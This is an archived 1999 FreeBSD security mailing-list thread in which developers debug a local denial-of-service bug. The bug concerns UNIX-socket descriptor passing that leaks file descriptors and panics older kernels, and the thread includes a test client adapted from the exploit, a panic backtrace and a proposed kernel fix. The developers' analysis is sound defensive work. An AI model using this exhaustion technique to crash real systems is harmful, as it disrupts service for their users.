From owner-freebsd-security Sat May 8 20:26:17 1999 Delivered-To: freebsd-security@freebsd.org Received: from gatekeeper.tsc.tdk.com (gatekeeper.tsc.tdk.com [207.113.159.21]) by hub.freebsd.org (Postfix) with ESMTP id 14D1A156B5 for ; Sat, 8 May 1999 20:26:15 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from sunrise.gv.tsc.tdk.com (root@sunrise.gv.tsc.tdk.com [192.168.241.191]) by gatekeeper.tsc.tdk.com (8.8.8/8.8.8) with ESMTP id UAA09528; Sat, 8 May 1999 20:26:09 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from salsa.gv.tsc.tdk.com (salsa.gv.tsc.tdk.com [192.168.241.194]) by sunrise.gv.tsc.tdk.com (8.8.5/8.8.5) with ESMTP id UAA14975; Sat, 8 May 1999 20:26:07 -0700 (PDT) Received: (from gdonl@localhost) by salsa.gv.tsc.tdk.com (8.8.5/8.8.5) id UAA19750; Sat, 8 May 1999 20:26:06 -0700 (PDT) From: Don Lewis Message-Id: <199905090326.UAA19750@salsa.gv.tsc.tdk.com> Date: Sat, 8 May 1999 20:26:05 -0700 In-Reply-To: Wes Peters "Re: KKIS.05051999.003b" (May 7, 11:34pm) X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95) To: Wes Peters , Don Lewis Subject: Re: KKIS.05051999.003b Cc: Kevin Day , security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On May 7, 11:34pm, Wes Peters wrote: } Subject: Re: KKIS.05051999.003b } Don Lewis wrote: } > } > On May 6, 2:10pm, Kevin Day wrote: } > } } > } Here's my testing so far: } > } } > } 2.2.2 - Vulnerable } > } 2.2.6 - Vulnerable } > } 2.2.8 - Vulnerable } > } 3.1-RELEASE - Ran 15 minutes, no crash. } } Let it keep running. It will (apparently) eventually exhaust all } available file handles in an unrecoverable manner. 3.1-R is better, } but not invulnerable. I don't see any obvious descriptor leaks, but the fact that FreeBSD < 3.1 panics (probably in unp_gc(), which Matt fixed) indicates that I'm missing something. The exploit code should not result in any calls to unp_gc(), because the client receives all the descriptors that are sent by the server. This should result in unp_rights being 0 except when the descriptor is in flight. If unp_rights is 0 when the socket is closed, unp_gc() should not be called. unp_gc() should only be called if the client closes socket before receiving the descriptor. Maybe a third process occasionally get scheduled while the exploit code has the descriptor in flight and causes unp_gc() to get executed. If so, then the exploit shouldn't cause a problem in single user mode. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 8 21:22: 0 1999 Delivered-To: freebsd-security@freebsd.org Received: from obie.softweyr.com (unknown [204.68.178.33]) by hub.freebsd.org (Postfix) with ESMTP id 5596714F17 for ; Sat, 8 May 1999 21:21:55 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from softweyr.com (homer.softweyr.com [204.68.178.39]) by obie.softweyr.com (8.8.8/8.8.8) with ESMTP id WAA18098; Sat, 8 May 1999 22:21:44 -0600 (MDT) (envelope-from wes@softweyr.com) Message-ID: <37350D57.C21154@softweyr.com> Date: Sat, 08 May 1999 22:21:43 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: Don Lewis Cc: Kevin Day , security@FreeBSD.ORG Subject: Re: KKIS.05051999.003b References: <199905090326.UAA19750@salsa.gv.tsc.tdk.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Don Lewis wrote: > > On May 7, 11:34pm, Wes Peters wrote: > } Subject: Re: KKIS.05051999.003b > } Don Lewis wrote: > } > > } > On May 6, 2:10pm, Kevin Day wrote: > } > } > } > } Here's my testing so far: > } > } > } > } 2.2.2 - Vulnerable > } > } 2.2.6 - Vulnerable > } > } 2.2.8 - Vulnerable > } > } 3.1-RELEASE - Ran 15 minutes, no crash. > } > } Let it keep running. It will (apparently) eventually exhaust all > } available file handles in an unrecoverable manner. 3.1-R is better, > } but not invulnerable. > > I don't see any obvious descriptor leaks, but the fact that FreeBSD < 3.1 > panics (probably in unp_gc(), which Matt fixed) indicates that I'm missing > something. The exploit code should not result in any calls to unp_gc(), > because the client receives all the descriptors that are sent by the server. Actually it doesn't. If you look up the first message I posted on this subject, I listed the error messages it produces, many of which indicated the client didn't get a descriptor from the server IIRC. Maybe that's how the descriptors are being lost; they've been sent on a UNIX domain socket and so have to remain open, have been closed by the server, working around it's limits, and have not been read by the client? > This should result in unp_rights being 0 except when the descriptor is > in flight. If unp_rights is 0 when the socket is closed, unp_gc() should not > be called. unp_gc() should only be called if the client closes socket before > receiving the descriptor. > > Maybe a third process occasionally get scheduled while the exploit code > has the descriptor in flight and causes unp_gc() to get executed. If so, > then the exploit shouldn't cause a problem in single user mode. I haven't had time to research this any further, I spent today chasing a VERY engergetic toddler. I'm too old for this. ;^) -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://www.softweyr.com/~softweyr wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 9 2:36:15 1999 Delivered-To: freebsd-security@freebsd.org Received: from verdi.nethelp.no (verdi.nethelp.no [158.36.41.162]) by hub.freebsd.org (Postfix) with SMTP id 0C17314E28 for ; Sun, 9 May 1999 02:35:58 -0700 (PDT) (envelope-from sthaug@nethelp.no) Received: (qmail 65141 invoked by uid 1001); 9 May 1999 09:29:52 +0000 (GMT) To: Don.Lewis@tsc.tdk.com Cc: wes@softweyr.com, toasty@HOME.DRAGONDATA.COM, security@FreeBSD.ORG Subject: Re: KKIS.05051999.003b From: sthaug@nethelp.no In-Reply-To: Your message of "Sat, 8 May 1999 20:26:05 -0700" References: <199905090326.UAA19750@salsa.gv.tsc.tdk.com> X-Mailer: Mew version 1.05+ on Emacs 19.34.2 Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Date: Sun, 09 May 1999 11:29:52 +0200 Message-ID: <65139.926242192@verdi.nethelp.no> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Maybe a third process occasionally get scheduled while the exploit code > has the descriptor in flight and causes unp_gc() to get executed. If so, > then the exploit shouldn't cause a problem in single user mode. It happens in single user mode too. In general, this program leaks one file descriptor for each time round the client/server loops - this is easy to see if you add some debugging printout to falloc()/ffree() in sys/kern/kern_descrip.c. If you parametrize the client loop, ie. case 0: for (n=0;n #include #include #include #define PATH_TMP "/tmp/123.tmp" main() { struct sockaddr_un addr_c; struct msghdr mymsghdr; int sockfd, l; if ((sockfd = socket(AF_UNIX, SOCK_DGRAM, 0)) == -1) perror("socket"); strcpy(addr_c.sun_path, PATH_TMP); addr_c.sun_len = sizeof(addr_c.sun_len) + sizeof(addr_c.sun_family) + strlen(addr_c.sun_path) + 1; addr_c.sun_family = AF_UNIX; if (bind(sockfd, (struct sockaddr*) &addr_c, addr_c.sun_len) == -1) perror("bind"); mymsghdr.msg_name = NULL; mymsghdr.msg_namelen = 0; mymsghdr.msg_iov = NULL; mymsghdr.msg_iovlen = 0; mymsghdr.msg_control = NULL; mymsghdr.msg_controllen = 0; mymsghdr.msg_flags = 0; if ( (l = recvmsg(sockfd, &mymsghdr, 0)) == -1) perror("recvmsg"); else printf("client: received len %d\n", l); close(sockfd); if ( unlink( PATH_TMP) == -1) perror("unlink"); } To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 9 4:17: 5 1999 Delivered-To: freebsd-security@freebsd.org Received: from verdi.nethelp.no (verdi.nethelp.no [158.36.41.162]) by hub.freebsd.org (Postfix) with SMTP id 26CF914DFA for ; Sun, 9 May 1999 04:17:02 -0700 (PDT) (envelope-from sthaug@nethelp.no) Received: (qmail 66150 invoked by uid 1001); 9 May 1999 11:17:01 +0000 (GMT) To: Don.Lewis@tsc.tdk.com Cc: wes@softweyr.com, toasty@HOME.DRAGONDATA.COM, security@FreeBSD.ORG Subject: Re: KKIS.05051999.003b From: sthaug@nethelp.no In-Reply-To: Your message of "Sat, 8 May 1999 20:26:05 -0700" References: <199905090326.UAA19750@salsa.gv.tsc.tdk.com> X-Mailer: Mew version 1.05+ on Emacs 19.34.2 Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Date: Sun, 09 May 1999 13:17:01 +0200 Message-ID: <66148.926248621@verdi.nethelp.no> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > I don't see any obvious descriptor leaks, but the fact that FreeBSD < 3.1 > panics (probably in unp_gc(), which Matt fixed) indicates that I'm missing > something. A 2.2.8 system I have here panics in sorflush (called from unp_gc()): void sorflush(so) register struct socket *so; { register struct sockbuf *sb = &so->so_rcv; register struct protosw *pr = so->so_proto; register int s; struct sockbuf asb; sb->sb_flags |= SB_NOINTR; (void) sblock(sb, M_WAITOK); s = splimp(); socantrcvmore(so); sbunlock(sb); asb = *sb; bzero((caddr_t)sb, sizeof (*sb)); splx(s); if (pr->pr_flags & PR_RIGHTS && pr->pr_domain->dom_dispose) (*pr->pr_domain->dom_dispose)(asb.sb_mb); sbrelease(&asb); } because so->so_proto is 0. Backtrace: #0 boot (howto=256) at ../../kern/kern_shutdown.c:275 #1 0xf01128ba in panic (fmt=0xf01bdf0f "page fault") at ../../kern/kern_shutdown.c:409 #2 0xf01beafa in trap_fatal (frame=0xefbffde4) at ../../i386/i386/trap.c:772 #3 0xf01be5bc in trap_pfault (frame=0xefbffde4, usermode=0) at ../../i386/i386/trap.c:681 #4 0xf01be247 in trap (frame={tf_es = 16, tf_ds = 16, tf_edi = -272630184, tf_esi = -260321820, tf_ebp = -272630184, tf_isp = -272630260, tf_ebx = -260321856, tf_edx = 1073610751, tf_ecx = 0, tf_eax = 0, tf_trapno = 12, tf_err = 0, tf_eip = -267232200, tf_cs = 8, tf_eflags = 66118, tf_esp = 0, tf_ss = -259461120}) at ../../i386/i386/trap.c:324 #5 0xf0125c38 in sorflush (so=0xf07bcd80) at ../../kern/uipc_socket.c:854 #6 0xf01297de in unp_gc () at ../../kern/uipc_usrreq.c:889 #7 0xf012908f in unp_detach (unp=0xf0548694) at ../../kern/uipc_usrreq.c:420 #8 0xf0128b42 in uipc_usrreq (so=0xf0890f00, req=1, m=0x0, nam=0x0, control=0x0) at ../../kern/uipc_usrreq.c:113 #9 0xf012720f in old_detach (so=0xf0890f00) at ../../kern/uipc_socket2.c:890 #10 0xf0124902 in soclose (so=0xf0890f00) at ../../kern/uipc_socket.c:209 #11 0xf011c607 in soo_close (fp=0xf0906540, p=0xf07d8800) at ../../kern/sys_socket.c:206 #12 0xf010b1bc in closef (fp=0xf0906540, p=0xf07d8800) at ../../kern/kern_descrip.c:896 #13 0xf010a8a9 in close (p=0xf07d8800, uap=0xefbfff94, retval=0xefbfff84) at ../../kern/kern_descrip.c:392 #14 0xf01bed93 in syscall (frame={tf_es = 39, tf_ds = 39, tf_edi = 0, tf_esi = -272638692, tf_ebp = -272638740, tf_isp = -272629788, tf_ebx = -272638688, tf_edx = -272638846, tf_ecx = -272638972, tf_eax = 6, tf_trapno = 7, tf_err = 7, tf_eip = 537330913, tf_cs = 31, tf_eflags = 646, tf_esp = -272639024, tf_ss = 39}) at ../../i386/i386/trap.c:920 #15 0x200704e1 in ?? () #16 0x163d in ?? () #17 0x1095 in ?? () Steinar Haug, Nethelp consulting, sthaug@nethelp.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 9 5:40:40 1999 Delivered-To: freebsd-security@freebsd.org Received: from gatekeeper.tsc.tdk.com (gatekeeper.tsc.tdk.com [207.113.159.21]) by hub.freebsd.org (Postfix) with ESMTP id 30E4014E61 for ; Sun, 9 May 1999 05:40:36 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from sunrise.gv.tsc.tdk.com (root@sunrise.gv.tsc.tdk.com [192.168.241.191]) by gatekeeper.tsc.tdk.com (8.8.8/8.8.8) with ESMTP id FAA11974; Sun, 9 May 1999 05:40:30 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from salsa.gv.tsc.tdk.com (salsa.gv.tsc.tdk.com [192.168.241.194]) by sunrise.gv.tsc.tdk.com (8.8.5/8.8.5) with ESMTP id FAA15973; Sun, 9 May 1999 05:40:29 -0700 (PDT) Received: (from gdonl@localhost) by salsa.gv.tsc.tdk.com (8.8.5/8.8.5) id FAA20619; Sun, 9 May 1999 05:40:27 -0700 (PDT) From: Don Lewis Message-Id: <199905091240.FAA20619@salsa.gv.tsc.tdk.com> Date: Sun, 9 May 1999 05:40:27 -0700 In-Reply-To: Wes Peters "Re: KKIS.05051999.003b" (May 8, 10:21pm) X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95) To: Wes Peters , Don Lewis Subject: Re: KKIS.05051999.003b Cc: Kevin Day , security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On May 8, 10:21pm, Wes Peters wrote: } Subject: Re: KKIS.05051999.003b } Don Lewis wrote: } > I don't see any obvious descriptor leaks, but the fact that FreeBSD < 3.1 } > panics (probably in unp_gc(), which Matt fixed) indicates that I'm missing } > something. The exploit code should not result in any calls to unp_gc(), } > because the client receives all the descriptors that are sent by the server. } } Actually it doesn't. If you look up the first message I posted on this } subject, I listed the error messages it produces, many of which indicated } the client didn't get a descriptor from the server IIRC. Maybe that's } how the descriptors are being lost; they've been sent on a UNIX domain } socket and so have to remain open, have been closed by the server, working } around it's limits, and have not been read by the client? I think all those messages are the result of running out of descriptors. If no more descriptors can be created, then socket will fail with ENFILE (23), and bind(), sendto(), and recvmsg() will fail with EBADF (9), and unlink() will fail with ENOENT (2). I'd have to study the code some more to work out the expected sequence of the errors assuming that no more descriptors could be created. The message containing the descriptor to be passed holds a reference to the descriptor, so it is permissible for the server to close the descriptor before the client receives the message. See unp_internalize() and unp_externalize(). BTW, how does this manage to work on the Alpha, where sizeof(int) != sizeof(pointer)? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 9 5:45:16 1999 Delivered-To: freebsd-security@freebsd.org Received: from gatekeeper.tsc.tdk.com (gatekeeper.tsc.tdk.com [207.113.159.21]) by hub.freebsd.org (Postfix) with ESMTP id 3B8DF15156 for ; Sun, 9 May 1999 05:45:14 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from sunrise.gv.tsc.tdk.com (root@sunrise.gv.tsc.tdk.com [192.168.241.191]) by gatekeeper.tsc.tdk.com (8.8.8/8.8.8) with ESMTP id FAA12010; Sun, 9 May 1999 05:45:00 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from salsa.gv.tsc.tdk.com (salsa.gv.tsc.tdk.com [192.168.241.194]) by sunrise.gv.tsc.tdk.com (8.8.5/8.8.5) with ESMTP id FAA15987; Sun, 9 May 1999 05:44:58 -0700 (PDT) Received: (from gdonl@localhost) by salsa.gv.tsc.tdk.com (8.8.5/8.8.5) id FAA20637; Sun, 9 May 1999 05:44:57 -0700 (PDT) From: Don Lewis Message-Id: <199905091244.FAA20637@salsa.gv.tsc.tdk.com> Date: Sun, 9 May 1999 05:44:57 -0700 In-Reply-To: sthaug@nethelp.no "Re: KKIS.05051999.003b" (May 9, 1:17pm) X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95) To: sthaug@nethelp.no, Don.Lewis@tsc.tdk.com Subject: Re: KKIS.05051999.003b Cc: wes@softweyr.com, toasty@HOME.DRAGONDATA.COM, security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On May 9, 1:17pm, sthaug@nethelp.no wrote: } Subject: Re: KKIS.05051999.003b } > I don't see any obvious descriptor leaks, but the fact that FreeBSD < 3.1 } > panics (probably in unp_gc(), which Matt fixed) indicates that I'm missing } > something. } } A 2.2.8 system I have here panics in sorflush (called from unp_gc()): This is the bug that Matt Dillon fixed just before 3.1-RELEASE, sorflush() is only supposed to be used on descriptors associated with sockets. This exploit code causes sorflush() to be called on a descriptor for an open file. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 9 6: 9:17 1999 Delivered-To: freebsd-security@freebsd.org Received: from gatekeeper.tsc.tdk.com (gatekeeper.tsc.tdk.com [207.113.159.21]) by hub.freebsd.org (Postfix) with ESMTP id EBE8115036 for ; Sun, 9 May 1999 06:09:14 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from sunrise.gv.tsc.tdk.com (root@sunrise.gv.tsc.tdk.com [192.168.241.191]) by gatekeeper.tsc.tdk.com (8.8.8/8.8.8) with ESMTP id GAA12139; Sun, 9 May 1999 06:08:52 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from salsa.gv.tsc.tdk.com (salsa.gv.tsc.tdk.com [192.168.241.194]) by sunrise.gv.tsc.tdk.com (8.8.5/8.8.5) with ESMTP id GAA16038; Sun, 9 May 1999 06:08:51 -0700 (PDT) Received: (from gdonl@localhost) by salsa.gv.tsc.tdk.com (8.8.5/8.8.5) id GAA20692; Sun, 9 May 1999 06:08:50 -0700 (PDT) From: Don Lewis Message-Id: <199905091308.GAA20692@salsa.gv.tsc.tdk.com> Date: Sun, 9 May 1999 06:08:49 -0700 In-Reply-To: sthaug@nethelp.no "Re: KKIS.05051999.003b" (May 9, 11:29am) X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95) To: sthaug@nethelp.no, Don.Lewis@tsc.tdk.com Subject: Re: KKIS.05051999.003b Cc: wes@softweyr.com, toasty@HOME.DRAGONDATA.COM, security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On May 9, 11:29am, sthaug@nethelp.no wrote: } Subject: Re: KKIS.05051999.003b } > Maybe a third process occasionally get scheduled while the exploit code } > has the descriptor in flight and causes unp_gc() to get executed. If so, } > then the exploit shouldn't cause a problem in single user mode. } } It happens in single user mode too. } } In general, this program leaks one file descriptor for each time round } the client/server loops - this is easy to see if you add some debugging } printout to falloc()/ffree() in sys/kern/kern_descrip.c. } } If you parametrize the client loop, ie. } } case 0: } for (n=0;n; Sun, 9 May 1999 06:13:36 -0700 (PDT) (envelope-from sthaug@nethelp.no) Received: (qmail 66939 invoked by uid 1001); 9 May 1999 13:13:35 +0000 (GMT) To: Don.Lewis@tsc.tdk.com Cc: wes@softweyr.com, toasty@HOME.DRAGONDATA.COM, security@FreeBSD.ORG Subject: Re: KKIS.05051999.003b From: sthaug@nethelp.no In-Reply-To: Your message of "Sun, 9 May 1999 06:08:49 -0700" References: <199905091308.GAA20692@salsa.gv.tsc.tdk.com> X-Mailer: Mew version 1.05+ on Emacs 19.34.2 Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Date: Sun, 09 May 1999 15:13:34 +0200 Message-ID: <66937.926255614@verdi.nethelp.no> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > } - The client is asking for messages with zero iov's, and length 0. To > } me, this means it shouldn't receive *anything* (file descriptors or > } otherwise). But the program included below, slightly modified from the > } client() routine, receives one message of length zero. The same thing > } happens on for instance NetBSD 1.4-BETA or NetBSD 1.3.2. Does this mean > } the semantics of receiving zero length messages aren't sufficiently > } well defined? > > I believe the length refers to the length of any data that might > accompany the descriptors. It should be OK to specify a length of 0. > Even if the server was sending data in its reply, I believe it would > not be an error to specify a zero length buffer. The data would just > be truncated to fit the buffer size. Okay, but why should the *standalone* version of the client receive any message at all (which it does: a zero length message) when there's no sender involved at all? Steinar Haug, Nethelp consulting, sthaug@nethelp.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 9 6:48:56 1999 Delivered-To: freebsd-security@freebsd.org Received: from gatekeeper.tsc.tdk.com (gatekeeper.tsc.tdk.com [207.113.159.21]) by hub.freebsd.org (Postfix) with ESMTP id 4F66814F29 for ; Sun, 9 May 1999 06:48:53 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from sunrise.gv.tsc.tdk.com (root@sunrise.gv.tsc.tdk.com [192.168.241.191]) by gatekeeper.tsc.tdk.com (8.8.8/8.8.8) with ESMTP id GAA12369; Sun, 9 May 1999 06:48:40 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from salsa.gv.tsc.tdk.com (salsa.gv.tsc.tdk.com [192.168.241.194]) by sunrise.gv.tsc.tdk.com (8.8.5/8.8.5) with ESMTP id GAA16152; Sun, 9 May 1999 06:48:39 -0700 (PDT) Received: (from gdonl@localhost) by salsa.gv.tsc.tdk.com (8.8.5/8.8.5) id GAA20785; Sun, 9 May 1999 06:48:37 -0700 (PDT) From: Don Lewis Message-Id: <199905091348.GAA20785@salsa.gv.tsc.tdk.com> Date: Sun, 9 May 1999 06:48:37 -0700 In-Reply-To: sthaug@nethelp.no "Re: KKIS.05051999.003b" (May 9, 3:13pm) X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95) To: sthaug@nethelp.no, Don.Lewis@tsc.tdk.com Subject: Re: KKIS.05051999.003b Cc: wes@softweyr.com, toasty@HOME.DRAGONDATA.COM, security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On May 9, 3:13pm, sthaug@nethelp.no wrote: } Subject: Re: KKIS.05051999.003b } > } - The client is asking for messages with zero iov's, and length 0. To } > } me, this means it shouldn't receive *anything* (file descriptors or } > } otherwise). But the program included below, slightly modified from the } > } client() routine, receives one message of length zero. The same thing } > } happens on for instance NetBSD 1.4-BETA or NetBSD 1.3.2. Does this mean } > } the semantics of receiving zero length messages aren't sufficiently } > } well defined? } > } > I believe the length refers to the length of any data that might } > accompany the descriptors. It should be OK to specify a length of 0. } > Even if the server was sending data in its reply, I believe it would } > not be an error to specify a zero length buffer. The data would just } > be truncated to fit the buffer size. } } Okay, but why should the *standalone* version of the client receive any } message at all (which it does: a zero length message) when there's no } sender involved at all? Darned if I know. Maybe it is because neither a data buffer or a control buffer is specified in your modified version. If you modify your example code to loop on recvmsg(), you'll find that recvmsg() will return 0 as many times as you want. FLASH! Now this is really wierd. The original exploit code doesn't show any signs leaking descriptors on one of our 3.1-stable machines, but /tmp (where the sockets are created) is mfs. If I change PATH and PATH_TMP so that they point to /var/tmp, sendmsg() fails with with ECONNREFUSED after the first iteration and descriptors are leaked. I might believe that descriptors could be leaked if sendmsg() fails this way, but why would sendmsg() fail if the sockets live in a ufs filesystem but not if the sockets live in a mfs filesystem? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 9 7: 7:39 1999 Delivered-To: freebsd-security@freebsd.org Received: from gatekeeper.tsc.tdk.com (gatekeeper.tsc.tdk.com [207.113.159.21]) by hub.freebsd.org (Postfix) with ESMTP id 59E4D154DF for ; Sun, 9 May 1999 07:07:34 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from sunrise.gv.tsc.tdk.com (root@sunrise.gv.tsc.tdk.com [192.168.241.191]) by gatekeeper.tsc.tdk.com (8.8.8/8.8.8) with ESMTP id HAA12452; Sun, 9 May 1999 07:06:09 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from salsa.gv.tsc.tdk.com (salsa.gv.tsc.tdk.com [192.168.241.194]) by sunrise.gv.tsc.tdk.com (8.8.5/8.8.5) with ESMTP id HAA16187; Sun, 9 May 1999 07:06:08 -0700 (PDT) Received: (from gdonl@localhost) by salsa.gv.tsc.tdk.com (8.8.5/8.8.5) id HAA20815; Sun, 9 May 1999 07:06:07 -0700 (PDT) From: Don Lewis Message-Id: <199905091406.HAA20815@salsa.gv.tsc.tdk.com> Date: Sun, 9 May 1999 07:06:07 -0700 In-Reply-To: Don Lewis "Re: KKIS.05051999.003b" (May 9, 6:48am) X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95) To: Don Lewis , sthaug@nethelp.no Subject: Re: KKIS.05051999.003b Cc: wes@softweyr.com, toasty@HOME.DRAGONDATA.COM, security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On May 9, 6:48am, Don Lewis wrote: } Subject: Re: KKIS.05051999.003b } FLASH! Now this is really wierd. The original exploit code doesn't show } any signs leaking descriptors on one of our 3.1-stable machines, but } /tmp (where the sockets are created) is mfs. If I change PATH and } PATH_TMP so that they point to /var/tmp, sendmsg() fails with with } ECONNREFUSED after the first iteration and descriptors are leaked. } } I might believe that descriptors could be leaked if sendmsg() fails this } way, but why would sendmsg() fail if the sockets live in a ufs filesystem } but not if the sockets live in a mfs filesystem? Ok, the first bug is in uipc_send(). If an error occurs between unp_internalize() and release:, then the work that unp_internalize() did needs to be undone. Probably something like: if (control && error != 0) unp_dispose(control); right before release: would do the trick. I haven't a clue about what appears to be bug number 2. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 9 7:28:25 1999 Delivered-To: freebsd-security@freebsd.org Received: from gatekeeper.tsc.tdk.com (gatekeeper.tsc.tdk.com [207.113.159.21]) by hub.freebsd.org (Postfix) with ESMTP id BBD87154A7 for ; Sun, 9 May 1999 07:28:23 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from sunrise.gv.tsc.tdk.com (root@sunrise.gv.tsc.tdk.com [192.168.241.191]) by gatekeeper.tsc.tdk.com (8.8.8/8.8.8) with ESMTP id HAA12553; Sun, 9 May 1999 07:28:08 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from salsa.gv.tsc.tdk.com (salsa.gv.tsc.tdk.com [192.168.241.194]) by sunrise.gv.tsc.tdk.com (8.8.5/8.8.5) with ESMTP id HAA16221; Sun, 9 May 1999 07:28:07 -0700 (PDT) Received: (from gdonl@localhost) by salsa.gv.tsc.tdk.com (8.8.5/8.8.5) id HAA20849; Sun, 9 May 1999 07:28:06 -0700 (PDT) From: Don Lewis Message-Id: <199905091428.HAA20849@salsa.gv.tsc.tdk.com> Date: Sun, 9 May 1999 07:28:06 -0700 In-Reply-To: sthaug@nethelp.no "Re: KKIS.05051999.003b" (May 9, 3:13pm) X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95) To: sthaug@nethelp.no, Don.Lewis@tsc.tdk.com Subject: Re: KKIS.05051999.003b Cc: wes@softweyr.com, toasty@HOME.DRAGONDATA.COM, security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On May 9, 3:13pm, sthaug@nethelp.no wrote: } Subject: Re: KKIS.05051999.003b } Okay, but why should the *standalone* version of the client receive any } message at all (which it does: a zero length message) when there's no } sender involved at all? I think this is part of bug number 2. What appears to be happening is that the client does sendto() and then does recvmsg() which returns and then the client continues on to do the next unlink() before the server wakes up and does its sendmsg(). When the server finally gets around to executing sendmsg(), the client has already unlinked the socket that the server is trying to send its reply to, causing the sendmsg() to fail and leak the descriptor that is being passed. The UFS vs MFS effect that I observed apparently affects the timing. If I add a sleep() call in the client before the recvmsg(), everything works as it should. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 10 7: 6:23 1999 Delivered-To: freebsd-security@freebsd.org Received: from gatekeeper.tsc.tdk.com (gatekeeper.tsc.tdk.com [207.113.159.21]) by hub.freebsd.org (Postfix) with ESMTP id 832E4152E5 for ; Mon, 10 May 1999 07:06:17 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from sunrise.gv.tsc.tdk.com (root@sunrise.gv.tsc.tdk.com [192.168.241.191]) by gatekeeper.tsc.tdk.com (8.8.8/8.8.8) with ESMTP id HAA21502; Mon, 10 May 1999 07:06:09 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from salsa.gv.tsc.tdk.com (salsa.gv.tsc.tdk.com [192.168.241.194]) by sunrise.gv.tsc.tdk.com (8.8.5/8.8.5) with ESMTP id HAA20080; Mon, 10 May 1999 07:06:08 -0700 (PDT) Received: (from gdonl@localhost) by salsa.gv.tsc.tdk.com (8.8.5/8.8.5) id HAA23383; Mon, 10 May 1999 07:06:06 -0700 (PDT) From: Don Lewis Message-Id: <199905101406.HAA23383@salsa.gv.tsc.tdk.com> Date: Mon, 10 May 1999 07:06:05 -0700 In-Reply-To: Don Lewis "Re: KKIS.05051999.003b" (May 9, 5:40am) X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95) To: Don Lewis , Wes Peters Subject: Re: KKIS.05051999.003b Cc: Kevin Day , security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On May 9, 5:40am, Don Lewis wrote: } Subject: Re: KKIS.05051999.003b } On May 8, 10:21pm, Wes Peters wrote: } } Subject: Re: KKIS.05051999.003b } } Don Lewis wrote: } } } > I don't see any obvious descriptor leaks, but the fact that FreeBSD < 3.1 } } > panics (probably in unp_gc(), which Matt fixed) indicates that I'm missing } } > something. The exploit code should not result in any calls to unp_gc(), } } > because the client receives all the descriptors that are sent by the server. } } } } Actually it doesn't. If you look up the first message I posted on this } } subject, I listed the error messages it produces, many of which indicated } } the client didn't get a descriptor from the server 